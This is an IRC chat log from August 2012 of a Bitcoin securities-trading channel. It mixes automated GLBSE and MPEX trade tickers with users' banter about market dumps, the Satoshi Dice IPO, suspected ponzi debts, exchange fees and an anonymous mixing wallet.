16:31:39 ;;bids 7 Aug 20 16:31:40 There are currently 65152.745 bitcoins demanded at or over 7.0 USD, worth 502440.522784 USD in total. Aug 20 16:32:20 Nope Aug 20 16:32:25 None as far as I can see Aug 20 16:32:49 Well there is this Aug 20 16:33:01 https://bitcointalk.org/index.php?topic=101958.0 Aug 20 16:34:43 [GLBSE] [ASICMINER] 20 @ 0.09949999 = 1.99 BTC [-] Aug 20 16:35:12 Every time dumps like that happens, Bitcoins go into stronger hands Aug 20 16:35:26 I just don't this strategy is going to work for whoever is dumping Aug 20 16:35:31 think* Aug 20 16:35:50 I mean, he just failed right now Aug 20 16:35:55 The market didn't panic Aug 20 16:36:28 What did I miss? Been gone three days Aug 20 16:36:30 EmanuelDeOrtego: yesterday there was a lot of panic. But with time market will became smarter, i think. Aug 20 16:36:40 MoneyIsDebt satoshi dice is ipoing Aug 20 16:36:51 wow, cool Aug 20 16:37:00 Are their profits public? Aug 20 16:37:03 mircea_popescu gets all the wonderful fees Aug 20 16:37:04 yes Aug 20 16:37:09 http://polimedia.us/bitcoin/mpex.php?mpsic=S.DICE Aug 20 16:37:20 Emanuel, dumping and repurchasing worked for me Aug 20 16:37:22 EmanuelDeOrtego actually mpex charges the lowest fee in all of btc. Aug 20 16:37:33 As long as I don't dump low eh Aug 20 16:37:43 BTC-Mining: It won't work right now. Somebody dumped to 8.70 then people bought it up to 9 again Aug 20 16:37:53 Haha yes Aug 20 16:38:19 micrea_popescu: Well, that is technically true if you discount the 20 BTC registration which is still fair. Aug 20 16:38:28 I like your model Aug 20 16:38:31 yeah, something like that. Aug 20 16:38:50 It lets the markets be more accurate. Aug 20 16:38:57 and you still get the bills paid. Aug 20 16:39:11 also cuts out on the drama something fierce. Aug 20 16:39:29 put 20 btc entrance barrier, lose 99.999% of all drama. Aug 20 16:39:32 seems a good deal to me. Aug 20 16:39:40 Righto. Aug 20 16:39:45 [GLBSE] [BITBOND] 5 @ 0.3799 = 1.8995 BTC [+] Aug 20 16:41:14 [GLBSE] [YABMC] 1 @ 0.1319 BTC [+] **** BEGIN LOGGING AT Tue Aug 21 00:15:45 2012 Aug 21 00:16:00 thanks Aug 21 00:16:17 mircea_popescu: Those are some fine prostitutes you have there. Aug 21 00:16:25 where do i have them ? Aug 21 00:17:28 http://polimedia.us/dtng/f/18.html Aug 21 00:17:42 a haha. Aug 21 00:17:53 personally i prefer http://polimedia.us/dtng/c/ Aug 21 00:18:03 Is that yours? Aug 21 00:18:07 I mean, is that your site? Aug 21 00:18:12 yea. Aug 21 00:18:54 Whatever floats your boat man. Aug 21 00:19:11 [GLBSE] [TYGRR.BOND-A] 1 @ 0.153 BTC [-] Aug 21 00:19:21 i own everything. there's http://trilema.com/ which happens to be the top romanian blog, Aug 21 00:19:31 there's http://polimedia.us/fain/ which is like romania's digg Aug 21 00:19:32 etc. Aug 21 00:19:40 i also happen to own romania's 4chan Aug 21 00:20:34 Ooo Aug 21 00:20:37 I see now Aug 21 00:21:24 [GLBSE] [YARR] 8 @ 1 = 8 BTC [+] Aug 21 00:21:35 [GLBSE] [TYGRR.BOND-P] 2 @ 0.85 = 1.7 BTC [+] Aug 21 00:22:35 it's a small country, and a little noobish. Aug 21 00:23:30 [GLBSE] [OBSI.HRPT] 1 @ 0.10101 BTC [+] Aug 21 00:29:26 < Diablo-D3> I still cant buy bitvps on glbse <<< i thought you could, isn't there a bitvps fund on glbse run by brendio? Aug 21 00:30:24 < EskimoBob> You missed the pr0n part probably << nope, wat i said was in referrence to other issues, on the pr0n topic, i don't really care and i don't see why porn gets a bad rap anyway Aug 21 00:31:49 < DeaDTerra> SDICE pass through has been submitted :) << hopefully nefario approves it b/f the actual ipo Aug 21 00:31:59 o hey Aug 21 00:32:08 i think deadterra was making one too! Aug 21 00:34:58 [GLBSE] [DMC] 2 @ 0.04200001 = 0.084 BTC [-] Aug 21 00:35:00 [GLBSE] [DMC] 12 @ 0.042 = 0.504 BTC [-] Aug 21 00:35:54 Diablo-D3 smickles there is https://glbse.com/asset/view/BIB.BVPS Aug 21 00:36:04 yeah, i thought so Aug 21 00:37:24 anyway, now if you want to trade stuff on mpex, i'll take your order. when I have the website up and running, you can just use that to trade on mpex and stop having to talk to me Aug 21 00:38:08 maybe people like to talk to you :D Aug 21 00:38:19 i'm not going to stop them :) Aug 21 00:38:36 all the buxom foxies etc.\ Aug 21 00:38:38 ;;ticker Aug 21 00:38:39 Best bid: 9.49999, Best ask: 9.5, Bid-ask spread: 0.00001, Last trade: 9.5, 24 hour volume: 203501, 24 hour low: 7.6, 24 hour high: 10.5 Aug 21 00:38:43 For the people that logged on to http://199.48.69.241/hotwallet please be sure to send me a quick comment with any ideas you have! Aug 21 00:38:54 usagi: what's that for? Aug 21 00:39:06 It's a secure anonymous wallet Aug 21 00:39:08 its a Aug 21 00:39:10 yea lol Aug 21 00:39:34 so it could be a 'burner' wallet? Aug 21 00:39:39 What's a burner? Aug 21 00:39:46 like a burner phone Aug 21 00:39:59 Do I really have to ask what a burner phone is Aug 21 00:40:02 use it once, throw it away so the po can't catch you Aug 21 00:40:13 Well not really Aug 21 00:40:27 Let's say you put 10 coins in this wallet Aug 21 00:40:31 When you next go to spend your coins Aug 21 00:40:38 they come randomly out of everyone else's address. Aug 21 00:40:52 automixing Aug 21 00:40:56 pretty cool Aug 21 00:41:11 indeed, what about the tx fees? Aug 21 00:41:18 You pay your own tx fees Aug 21 00:41:21 0.005 or whatever it is Aug 21 00:41:28 it's 0.005 or 0.0005? Aug 21 00:41:42 ok so, for people that don't have/don't like python, there's now a perl equivalent of pympex Aug 21 00:41:43 https://github.com/modsix/BitOTTer/tree/master/perl_tools Aug 21 00:41:58 it's spreading Aug 21 00:41:59 and the guy (mod6) is also doing a mobile thing. Aug 21 00:46:00 [GLBSE] [TYGRR.BOND-P] 1 @ 0.795 BTC [-] Aug 21 00:46:01 [GLBSE] [TYGRR.BOND-P] 10 @ 0.7901337 = 7.9013 BTC [-] Aug 21 00:46:03 [GLBSE] [TYGRR.BOND-P] 14 @ 0.79 = 11.06 BTC [-] Aug 21 00:46:04 [GLBSE] [TYGRR.BOND-P] 2 @ 0.78 = 1.56 BTC [-] Aug 21 00:46:05 [GLBSE] [TYGRR.BOND-P] 5 @ 0.7 = 3.5 BTC [-] Aug 21 00:46:06 [GLBSE] [TYGRR.BOND-P] 10 @ 0.68000001 = 6.8 BTC [-] Aug 21 00:46:08 [GLBSE] [TYGRR.BOND-P] 15 @ 0.67001 = 10.0502 BTC [-] Aug 21 00:46:09 [GLBSE] [TYGRR.BOND-P] 83 @ 0.67 = 55.61 BTC [-] Aug 21 00:46:11 heavy dump Aug 21 00:46:15 o wow passthroughs trading in distress ? Aug 21 00:46:20 isn't the pirate repaying ? Aug 21 00:46:22 [GLBSE] [KRAKEN] 1000 @ 0.01 = 10 BTC Aug 21 00:46:30 well Aug 21 00:46:32 think about it Aug 21 00:46:45 if he would loan 100000 dollars from bank, he'd be a millionaire Aug 21 00:46:55 since he'd make over 7% a week.... Aug 21 00:46:57 haha i don't need to think about it, i was saying all along lol! Aug 21 00:47:05 :P Aug 21 00:47:14 what do u think Aug 21 00:47:15 ponzi or not? Aug 21 00:47:16 some people are claiming to have been paid back Aug 21 00:47:17 just a little fake shock there. Aug 21 00:47:20 dub: who+ Aug 21 00:47:21 ? Aug 21 00:47:24 Anduck i _still_ think it was a ponzi Aug 21 00:47:26 don't recall Aug 21 00:47:30 yeah the P selling at .67 is crazy low Aug 21 00:47:34 someone in the channel Aug 21 00:47:38 wish i had more coin Aug 21 00:47:45 i want has buy more lol Aug 21 00:47:48 Chaaang-Noi: dont u think it's a ponzi? Aug 21 00:47:59 well he runs tygrr. Aug 21 00:48:11 i want to buy that bond, and yeah its my bond:) Aug 21 00:48:14 and met the man in Vegas Aug 21 00:48:36 Chaaang-Noi: It buys back at what ? Aug 21 00:48:40 price Aug 21 00:48:42 ? Aug 21 00:48:45 1 or more if interest Aug 21 00:48:52 1.068 Aug 21 00:49:05 if pirate doesnt pay you, still ? Aug 21 00:49:06 tomorrow, right ? Aug 21 00:49:16 sorry - Tuesday Aug 21 00:49:17 if pirate will not pay its worth 0 btc Aug 21 00:49:33 PI is worht 1 btc no mater what Aug 21 00:52:56 [GLBSE] [NASTY] 3 @ 0.6498 = 1.9494 BTC [+] Aug 21 00:55:09 [MPEX] [S.MPOE] 10598 @ 0.00040472 = 4.2892 BTC [+] Aug 21 00:55:11 [MPEX] [S.MPOE] 53539 @ 0.00040572 = 21.7218 BTC [+] Aug 21 00:55:11 [MPEX] [S.MPOE] 28694 @ 0.00040643 = 11.6621 BTC [+] Aug 21 00:55:12 [MPEX] [S.MPOE] 17063 @ 0.0004066 = 6.9378 BTC [+] Aug 21 00:55:13 [MPEX] [S.MPOE] 37096 @ 0.00040663 = 15.0843 BTC [+] Aug 21 00:55:14 [MPEX] [S.MPOE] 1500 @ 0.00040663 = 0.6099 BTC [+] Aug 21 00:55:15 [MPEX] [S.MPOE] 18300 @ 0.00040676 = 7.4437 BTC [+] Aug 21 00:55:16 [MPEX] [S.MPOE] 28900 @ 0.00040693 = 11.7603 BTC [+] Aug 21 00:55:17 [MPEX] [S.MPOE] 8100 @ 0.00040737 = 3.2997 BTC [+] Aug 21 00:55:18 [MPEX] [S.MPOE] 49200 @ 0.00040746 = 20.047 BTC [+] Aug 21 00:55:19 [MPEX] [S.MPOE] 2805 @ 0.00040752 = 1.1431 BTC [+] Aug 21 00:55:20 [MPEX] [S.MPOE] 41200 @ 0.00040802 = 16.8104 BTC [+] Aug 21 00:55:20 [MPEX] [S.MPOE] 59200 @ 0.00040802 = 24.1548 BTC [+] Aug 21 00:55:21 [MPEX] [S.MPOE] 17900 @ 0.00040804 = 7.3039 BTC [+] Aug 21 00:55:22 [MPEX] [S.MPOE] 28800 @ 0.00040812 = 11.7539 BTC [+] Aug 21 00:55:23 [MPEX] [S.MPOE] 31332 @ 0.00040881 = 12.8088 BTC [+] Aug 21 00:55:24 [MPEX] [S.MPOE] 600 @ 0.00040885 = 0.2453 BTC [+] Aug 21 00:55:25 [MPEX] [S.MPOE] 5398 @ 0.00040893 = 2.2074 BTC [+] Aug 21 00:55:26 [MPEX] [S.MPOE] 2441 @ 0.00040901 = 0.9984 BTC [+] Aug 21 00:55:27 [MPEX] [S.MPOE] 28400 @ 0.00040905 = 11.617 BTC [+] Aug 21 00:55:28 [MPEX] [S.MPOE] 9600 @ 0.00040918 = 3.9281 BTC [+] Aug 21 00:55:29 [MPEX] [S.MPOE] 19334 @ 0.00040926 = 7.9126 BTC [+] Aug 21 00:56:04 [GLBSE] [NASTY] 20 @ 0.65 = 13 BTC [+] Aug 21 00:58:07 [GLBSE] [GIGAMINING] 1 @ 1.0353 BTC [+] Aug 21 00:59:45 /nick gigatube Aug 21 01:01:00 [MPEX] [O.BTCUSD.P130T] 1 @ 0.48953997 BTC [+] Aug 21 01:03:10 [GLBSE] [TYGRR.BOND-B] 200 @ 0.1 = 20 BTC [-] Aug 21 01:06:27 [GLBSE] [TYGRR.BOND-B] 61 @ 0.1 = 6.1 BTC [-] Aug 21 01:06:46 [GLBSE] [OBSI.HRPT] 1 @ 0.10101 BTC [+] Aug 21 01:09:42 [GLBSE] [NYAN.B] 75 @ 1 = 75 BTC [-] Aug 21 01:13:35 [GLBSE] [ASICMINER] 1 @ 0.0987 BTC [-] Aug 21 01:15:14 lol. inb4 drama. Aug 21 01:18:49 I managed to kill the Bitcoin Savings and Trust irc channel Aug 21 01:19:57 wd Aug 21 01:21:49 [GLBSE] [OBSI.HRPT] 3 @ 0.10101 = 0.303 BTC [+] Aug 21 01:29:21 lol Aug 21 01:29:28 [GLBSE] [YABMC] 9 @ 0.1319 = 1.1871 BTC [+] Aug 21 01:29:30 EmanuelDeOrtego what did you do ? crosspost dead kittens ? Aug 21 01:30:27 I just said I don't put anything above myself and then *boom* Aug 21 01:30:37 Everyone needs a master apparently Aug 21 01:30:38 [MPEX] [F.GIGA.ETF] 800 @ 0.00097107 = 0.7769 BTC [-] Aug 21 01:30:40 [MPEX] [F.GIGA.ETF] 3553 @ 0.00096659 = 3.4343 BTC [-] Aug 21 01:30:41 [MPEX] [F.GIGA.ETF] 5393 @ 0.00095587 = 5.155 BTC [-] Aug 21 01:30:42 [MPEX] [F.GIGA.ETF] 2600 @ 0.0009416 = 2.4482 BTC [-] Aug 21 01:30:43 [MPEX] [F.GIGA.ETF] 1626 @ 0.00093696 = 1.5235 BTC [-] Aug 21 01:30:44 [MPEX] [F.GIGA.ETF] 3128 @ 0.00093592 = 2.9276 BTC [-] Aug 21 01:31:12 Everyone needs a master apparently << this is true. Aug 21 01:31:26 heh, well I'll happily die then Aug 21 01:31:41 https://bitcointalk.org/index.php?topic=102057.0 Aug 21 01:31:49 hahahaha Aug 21 01:31:56 This is genius Aug 21 01:32:05 "You'll be feeling hot to trot every time you use this wallet." Aug 21 01:32:07 lol'd Aug 21 01:33:16 EmanuelDeOrtego why do you have to die ? Aug 21 01:34:09 I simply value living under my own will. Aug 21 01:34:12 Nothing more. Aug 21 01:34:29 [GLBSE] [TYGRR.BOND-B] 75 @ 0.1 = 7.5 BTC [-] Aug 21 01:35:33 that was a fun read Aug 21 01:36:04 [GLBSE] [BIB.PIRATE] 9 @ 0.71001 = 6.3901 BTC [-] Aug 21 01:36:52 copumpkin: mind saying if pirate ows you btc? Aug 21 01:37:02 he does Aug 21 01:37:39 copumpkin are you screwed when he doesn't pay ? Aug 21 01:38:06 EmanuelDeOrtego i see no problem with that. still, most people need a master, some people actually know this, some people are still struggling with accepting it. **** ENDING LOGGING AT Tue Aug 21 01:53:57 2012 **** BEGIN LOGGING AT Tue Aug 21 01:54:22 2012 Aug 21 01:55:36 [GLBSE] [BDT] 5 @ 1.02 = 5.1 BTC [+] Aug 21 01:56:13 [GLBSE] [JTME] 5 @ 0.987779 = 4.9389 BTC [-] Aug 21 01:56:14 [GLBSE] [JTME] 1 @ 0.98778 BTC [+] Aug 21 01:56:15 [GLBSE] [JTME] 5 @ 0.9878 = 4.939 BTC [+] Aug 21 01:56:16 [GLBSE] [JTME] 1 @ 0.9879 BTC [+] Aug 21 01:56:18 [GLBSE] [JTME] 7 @ 0.988 = 6.916 BTC [+] Aug 21 01:57:17 [GLBSE] [TYGRR.BOT] 10 @ 0.91 = 9.1 BTC [-] Aug 21 01:58:50 ;;ticker Aug 21 01:58:51 Best bid: 9.695, Best ask: 9.69786, Bid-ask spread: 0.00286, Last trade: 9.81999, 24 hour volume: 204513, 24 hour low: 7.6, 24 hour high: 10.5 Aug 21 01:59:01 ;;asks 10 Aug 21 01:59:03 There are currently 2793.6879 bitcoins offered at or under 10.0 USD, worth 27850.6671383 USD in total. Aug 21 02:00:47 [MPEX] [O.BTCUSD.P070N] 9 @ 0.09853019 = 0.8868 BTC [+] Aug 21 02:03:03 [GLBSE] [OBSI.HRPT] 1 @ 0.10101 BTC [+] **** ENDING LOGGING AT Tue Aug 21 02:03:16 2012 **** BEGIN LOGGING AT Tue Aug 21 02:16:57 2012 Aug 21 02:17:09 lmao the S.DICE forum thread is such a funny read. Aug 21 02:18:33 [GLBSE] [OBSI.HRPT] 1 @ 0.10101 BTC [+] Aug 21 02:19:21 [GLBSE] [TYGRR.BOND-P] 1 @ 0.825 BTC [+] Aug 21 02:19:32 [GLBSE] [BTCMC] 2 @ 0.5401 = 1.0802 BTC [-] Aug 21 02:19:47 [MPEX] [S.MPOE] 5465 @ 0.00040926 = 2.2366 BTC [+] Aug 21 02:20:11 [GLBSE] [ASICMINER] 6 @ 0.0987 = 0.5922 BTC [-] Aug 21 02:21:11 [MPEX] [F.GIGA.ETF] 1100 @ 0.0009713 = 1.0684 BTC [+] Aug 21 02:21:16 so, today i've seen a lot of mpex hate, and s.mpoe hit an all time high … porn is good Aug 21 02:21:36 [GLBSE] [ASICMINER] 2 @ 0.0988 = 0.1976 BTC [+] Aug 21 02:21:37 [GLBSE] [ASICMINER] 42 @ 0.099 = 4.158 BTC [+] Aug 21 02:22:16 smickles it's funny, bunch of sanctimonius nitwits Aug 21 02:22:24 "o, nobody asked my permission for this, how could it be!!!"\ Aug 21 02:22:44 "o, i'm on a cryptocurrency but haven't a year later figured out how to work gribble, yet i should be taken seriously" Aug 21 02:22:45 wtf. Aug 21 02:22:46 [MPEX] [S.MPOE] 3900 @ 0.00040822 = 1.5921 BTC [-] Aug 21 02:23:13 lol Aug 21 02:23:22 what was the permission thing referring to? Aug 21 02:23:23 but the most amusing part is where the nitwits have the gall to bring the volume argument Aug 21 02:23:24 [GLBSE] [BDK.BND] 7 @ 0.102 = 0.714 BTC [-] Aug 21 02:23:26 [GLBSE] [BDK.BND] 42 @ 0.1011 = 4.2462 BTC [-] Aug 21 02:23:35 saying mpex has no volume is like going to mtgox and saying, oh, you're irrelevant. Aug 21 02:23:45 dude, mpex does > 2/3 of all securities transactions. Aug 21 02:24:32 but mircea, glbse is like 200x larger than mpex (even tho it has 200x more dead assets still listed and trading last i checked) Aug 21 02:24:54 right. mpex has NEVER had an "investor" run with the money. Aug 21 02:25:11 [GLBSE] [PPT.A] 4 @ 1.1799 = 4.7196 BTC [+] Aug 21 02:25:13 [GLBSE] [PPT.A] 95 @ 1.18 = 112.1 BTC [+] Aug 21 02:25:15 most glbse assets to date imploded. i still remember the lib crap, much akin to the zip crap Aug 21 02:25:20 i think people see that volume tab on each glbse asset and think it's daily volume or somethin Aug 21 02:25:26 and yet... apparently... i should explain my credibility to the forum gang Aug 21 02:25:29 very impressing argument. Aug 21 02:25:39 heh, i even had a glbse implosion Aug 21 02:25:40 i think it's all time, isn't it ? Aug 21 02:25:43 [GLBSE] [OBSI.HRPT] 2 @ 0.10101 = 0.202 BTC [+] Aug 21 02:25:59 yeah, it's since glbse v2 launched Aug 21 02:26:02 heck knows what they do, 5 days and unspecified days i never heard of it. Aug 21 02:26:09 do week and month what the hell. Aug 21 02:26:12 so assets like mpoe.etf show way lower Aug 21 02:26:29 nutty scheme. Aug 21 02:26:55 [GLBSE] [KRAKEN] 195 @ 0.01 = 1.95 BTC Aug 21 02:27:21 well, it seems that ciuciu is an honest person at least Aug 21 02:27:23 [GLBSE] [BDK.BND] 3 @ 0.101 = 0.303 BTC [-] Aug 21 02:27:37 at least im glad people are starting to offer sanely-er priced shares Aug 21 02:27:40 he showed up in the sdice thread and screamed porn Aug 21 02:27:46 [MPEX] [S.MPOE] 6500 @ 0.00040764 = 2.6497 BTC [-] Aug 21 02:27:47 [MPEX] [S.MPOE] 11016 @ 0.00040926 = 4.5084 BTC [+] Aug 21 02:27:49 [MPEX] [S.MPOE] 1000 @ 0.00040932 = 0.4093 BTC [+] Aug 21 02:27:49 none of that 1 btc per share bs. kraken at 0,01 etc. Aug 21 02:27:50 [GLBSE] [KRAKEN] 5 @ 0.01 = 0.05 BTC Aug 21 02:27:51 [MPEX] [S.MPOE] 6100 @ 0.00040969 = 2.4991 BTC [+] Aug 21 02:27:52 [MPEX] [S.MPOE] 8402 @ 0.0004097 = 3.4423 BTC [+] Aug 21 02:27:52 [MPEX] [S.MPOE] 24772 @ 0.00040973 = 10.1498 BTC [+] Aug 21 02:28:06 and maybe if they copy margin and do a few more things mpex has been doing it'll be a much better exchange overall, so. Aug 21 02:28:07 nothing's lost. Aug 21 02:28:50 even tho people are all emotional and oddly prudeish, competition is good Aug 21 02:29:19 i styill haven't figured that out, btw. such clique-ish-isms Aug 21 02:29:52 [GLBSE] [YABMC] 1 @ 0.132 BTC [+] Aug 21 02:30:28 What is the outcome if: Aug 21 02:30:33 https://github.com/modsix/BitOTTer/blob/master/perl_tools/bitotter.pl btw. moar perlness. Aug 21 02:30:37 a) the sky falls Aug 21 02:30:44 oh, one thing, they were saying that some of those girls on dtng were openly soliciting money for sex. is that a legal liability where you are? Aug 21 02:30:47 b) nucular fuckin warfare Aug 21 02:31:11 smickles people saying things on the internet is not a legal liability where i are. Aug 21 02:31:22 it used to not be in the us, either, but apparently it's gone downhill Aug 21 02:31:26 dub ikr? Aug 21 02:32:24 sgornic is a fucking retard Aug 21 02:32:27 ignore it Aug 21 02:32:35 eh ?! Aug 21 02:32:45 ya know, when i was a kid (like 8 or something) i thought that it was strange that they had to tell us this was a free country Aug 21 02:32:48 stephen gornick Aug 21 02:32:54 what's he done ? Aug 21 02:33:04 smickles astute point for an 8 yo. Aug 21 02:33:10 btw, did you read that oui zappa interview ? Aug 21 02:33:13 https://bitcointalk.org/index.php?topic=76239.msg1117401#msg1117401 Aug 21 02:34:21 a ty. Aug 21 02:34:26 [GLBSE] [BTCMC] 4 @ 0.5602 = 2.2408 BTC [+] Aug 21 02:34:29 hey, why'd he have to be a retard, it's just asking. Aug 21 02:34:29 heh, i may have neglected to get arround to it (if i'm remembering the correct thing) would you post the link again? Aug 21 02:34:55 http://www.afka.net/Mags/Oui.htm#1979Apr Aug 21 02:41:52 [GLBSE] [OBSI.HRPT] 2 @ 0.10101 = 0.202 BTC [+] Aug 21 02:43:37 [GLBSE] [NYAN.C] 4 @ 0.985 = 3.94 BTC [+] Aug 21 02:44:25 [GLBSE] [BTCMC] 4 @ 0.5602 = 2.2408 BTC [+] Aug 21 02:44:54 [GLBSE] [BTCMC] 2 @ 0.5601 = 1.1202 BTC [-] Aug 21 02:46:35 [GLBSE] [BDK.BND] 100 @ 0.101 = 10.1 BTC [-] Aug 21 02:47:00 [GLBSE] [KRAKEN] 12 @ 0.01 = 0.12 BTC Aug 21 02:47:13 [GLBSE] [BDK.BND] 50 @ 0.101 = 5.05 BTC [-] Aug 21 02:47:24 [GLBSE] [KRAKEN] 1 @ 0.01 BTC Aug 21 02:47:45 [GLBSE] [BTCMC] 4 @ 0.5302 = 2.1208 BTC [-] Aug 21 02:48:30 [GLBSE] [BTCMC] 3 @ 0.5301 = 1.5903 BTC [-] Aug 21 02:51:06 [GLBSE] [PPT.A] 6 @ 1.18 = 7.08 BTC [+] Aug 21 02:53:56 [MPEX] [F.GIGA.ETF] 1100 @ 0.00095495 = 1.0504 BTC [-] Aug 21 02:54:50 [GLBSE] [OBSI.HRPT] 5 @ 0.10101 = 0.5051 BTC [+] Aug 21 02:55:29 yeah, i'm about 1/4 the way thru it. I haven't read it before Aug 21 02:56:07 its one of the better interviews ever given imo. Aug 21 02:56:40 so I wonder how long it'll take DMC to reach 100mh/share Aug 21 02:57:11 [MPEX] [S.MPOE] 20700 @ 0.00039163 = 8.1067 BTC [-] Aug 21 02:58:01 [GLBSE] [OBSI.HRPT] 20 @ 0.1026 = 2.052 BTC [+] Aug 21 03:00:43 [MPEX] [O.BTCUSD.P100T] 3 @ 0.13613699 = 0.4084 BTC [+] Aug 21 03:12:20 [GLBSE] [OBSI.HRPT] 100 @ 0.1027 = 10.27 BTC [+] Aug 21 03:12:44 [GLBSE] [OBSI.HRPT] 154 @ 0.1028 = 15.8312 BTC [+] Aug 21 03:13:04 [GLBSE] [OBSI.HRPT] 100 @ 0.1028 = 10.28 BTC [+] Aug 21 03:14:16 [GLBSE] [BTCWEB] 50 @ 0.1099 = 5.495 BTC [+] Aug 21 03:15:56 [GLBSE] [BIOETHANOL] 11 @ 0.9 = 9.9 BTC [-] Aug 21 03:16:46 [GLBSE] [BDK] 5 @ 0.095 = 0.475 BTC [-] Aug 21 03:18:29 [GLBSE] [TCC] 2 @ 0.11 = 0.22 BTC [-] Aug 21 03:18:51 [GLBSE] [TYGRR.BOND-P] 62 @ 0.83 = 51.46 BTC [+] Aug 21 03:19:24 [GLBSE] [TCC] 31 @ 0.162 = 5.022 BTC [+] Aug 21 03:19:41 [GLBSE] [TCC] 20 @ 0.176 = 3.52 BTC [+] Aug 21 03:20:14 [GLBSE] [BDK] 3 @ 0.1 = 0.3 BTC [+] Aug 21 03:20:59 [GLBSE] [IBB] 10 @ 0.5999 = 5.999 BTC [-] Aug 21 03:21:57 [GLBSE] [IBB] 10 @ 0.6 = 6 BTC [+] Aug 21 03:27:40 [GLBSE] [TYGRR.BOND-P] 2 @ 0.839 = 1.678 BTC [+] Aug 21 03:27:41 [MPEX] [S.MPOE] 8200 @ 0.00039163 = 3.2114 BTC [-] Aug 21 03:31:38 [MPEX] [O.BTCUSD.C090T] 1000 @ 0.14711153 = 147.1115 BTC [-] Aug 21 03:37:17 [MPEX] [O.BTCUSD.P100T] 3 @ 0.08592948 = 0.2578 BTC [-] Aug 21 03:37:40 [MPEX] [O.BTCUSD.P130T] 1 @ 0.34959337 BTC [-] Aug 21 03:37:54 [GLBSE] [BTCMC] 2 @ 0.35 = 0.7 BTC [-] Aug 21 03:39:33 [MPEX] [S.MPOE] 60000 @ 0.00038381 = 23.0286 BTC [-] Aug 21 03:39:35 [MPEX] [S.MPOE] 974 @ 0.00038508 = 0.3751 BTC [+] Aug 21 03:39:35 [MPEX] [S.MPOE] 18300 @ 0.0004048 = 7.4078 BTC [+] Aug 21 03:39:36 [MPEX] [S.MPOE] 17528 @ 0.00040973 = 7.1817 BTC [+] Aug 21 03:39:38 [MPEX] [S.MPOE] 16000 @ 0.00041001 = 6.5602 BTC [+] Aug 21 03:39:39 [MPEX] [S.MPOE] 16577 @ 0.00041002 = 6.7969 BTC [+] Aug 21 03:39:40 [MPEX] [S.MPOE] 54112 @ 0.00041004 = 22.1881 BTC [+] Aug 21 03:39:41 [MPEX] [S.MPOE] 33300 @ 0.00041016 = 13.6583 BTC [+] Aug 21 03:39:42 [MPEX] [S.MPOE] 16600 @ 0.00041027 = 6.8105 BTC [+] Aug 21 03:39:43 [MPEX] [S.MPOE] 46000 @ 0.00041027 = 18.8724 BTC [+] Aug 21 03:39:44 [MPEX] [S.MPOE] 41620 @ 0.00041063 = 17.0904 BTC [+] Aug 21 03:39:45 [MPEX] [S.MPOE] 18700 @ 0.00041101 = 7.6859 BTC [+] Aug 21 03:39:46 [MPEX] [S.MPOE] 44300 @ 0.00041102 = 18.2082 BTC [+] Aug 21 03:39:47 [MPEX] [S.MPOE] 38800 @ 0.00041131 = 15.9588 BTC [+] Aug 21 03:39:48 [MPEX] [S.MPOE] 21600 @ 0.00041186 = 8.8962 BTC [+] Aug 21 03:39:49 [MPEX] [S.MPOE] 13700 @ 0.00041208 = 5.6455 BTC [+] Aug 21 03:39:50 [MPEX] [S.MPOE] 41889 @ 0.00041245 = 17.2771 BTC [+] Aug 21 03:39:58 [GLBSE] [FPGAMINING] 1 @ 0.9095 BTC [+] Aug 21 03:39:59 [GLBSE] [FPGAMINING] 4 @ 0.90995 = 3.6398 BTC [+] Aug 21 03:40:01 [GLBSE] [FPGAMINING] 10 @ 0.91 = 9.1 BTC [+] Aug 21 03:40:17 [GLBSE] [FPGAMINING] 1 @ 0.91 BTC [+] Aug 21 03:41:11 [GLBSE] [OBSI.HRPT] 3 @ 0.1028 = 0.3084 BTC [+] Aug 21 03:41:27 [MPEX] [F.GIGA.ETF] 19265 @ 0.00095495 = 18.3971 BTC [-] Aug 21 03:41:29 [MPEX] [F.GIGA.ETF] 19968 @ 0.00096293 = 19.2278 BTC [+] Aug 21 03:41:30 [MPEX] [F.GIGA.ETF] 1700 @ 0.0009713 = 1.6512 BTC [+] Aug 21 03:41:31 [MPEX] [F.GIGA.ETF] 12869 @ 0.00097662 = 12.5681 BTC [+] Aug 21 03:41:33 [MPEX] [F.GIGA.ETF] 13100 @ 0.00097768 = 12.8076 BTC [+] Aug 21 03:41:34 [MPEX] [F.GIGA.ETF] 19649 @ 0.00098076 = 19.271 BTC [+] Aug 21 03:41:34 [MPEX] [F.GIGA.ETF] 1118 @ 0.00098404 = 1.1002 BTC [+] Aug 21 03:41:35 [MPEX] [F.GIGA.ETF] 12331 @ 0.00099077 = 12.2172 BTC [+] Aug 21 03:41:48 [MPEX] [F.GIGA.ETF] 5413 @ 0.00099077 = 5.363 BTC [+] Aug 21 03:41:49 [MPEX] [F.GIGA.ETF] 16745 @ 0.00099322 = 16.6315 BTC [+] Aug 21 03:41:51 [MPEX] [F.GIGA.ETF] 11825 @ 0.00099532 = 11.7697 BTC [+] Aug 21 03:41:51 [MPEX] [F.GIGA.ETF] 2900 @ 0.00099675 = 2.8906 BTC [+] Aug 21 03:41:52 [MPEX] [F.GIGA.ETF] 6600 @ 0.00099843 = 6.5896 BTC [+] Aug 21 03:41:53 [MPEX] [F.GIGA.ETF] 12300 @ 0.00100166 = 12.3204 BTC [+] Aug 21 03:41:54 [MPEX] [F.GIGA.ETF] 4776 @ 0.00100205 = 4.7858 BTC [+] Aug 21 03:41:56 [MPEX] [F.GIGA.ETF] 14064 @ 0.00100365 = 14.1153 BTC [+] Aug 21 03:41:57 [MPEX] [F.GIGA.ETF] 737 @ 0.00100515 = 0.7408 BTC [+] Aug 21 03:41:58 [MPEX] [F.GIGA.ETF] 6500 @ 0.00100525 = 6.5341 BTC [+] Aug 21 03:41:59 [MPEX] [F.GIGA.ETF] 5677 @ 0.00100625 = 5.7125 BTC [+] Aug 21 03:42:00 [MPEX] [F.GIGA.ETF] 12463 @ 0.0010063 = 12.5415 BTC [+] Aug 21 03:42:14 [MPEX] [F.GIGA.ETF] 2237 @ 0.0010063 = 2.2511 BTC [+] Aug 21 03:42:15 [MPEX] [F.GIGA.ETF] 17500 @ 0.00100645 = 17.6129 BTC [+] Aug 21 03:42:17 [MPEX] [F.GIGA.ETF] 5400 @ 0.00100782 = 5.4422 BTC [+] Aug 21 03:42:18 [MPEX] [F.GIGA.ETF] 8156 @ 0.00100858 = 8.226 BTC [+] Aug 21 03:42:19 [MPEX] [F.GIGA.ETF] 16707 @ 0.00101249 = 16.9157 BTC [+] Aug 21 03:42:22 [GLBSE] [RSM] 2 @ 0.255 = 0.51 BTC [-] Aug 21 03:42:41 [GLBSE] [FUTUREFUND] 34 @ 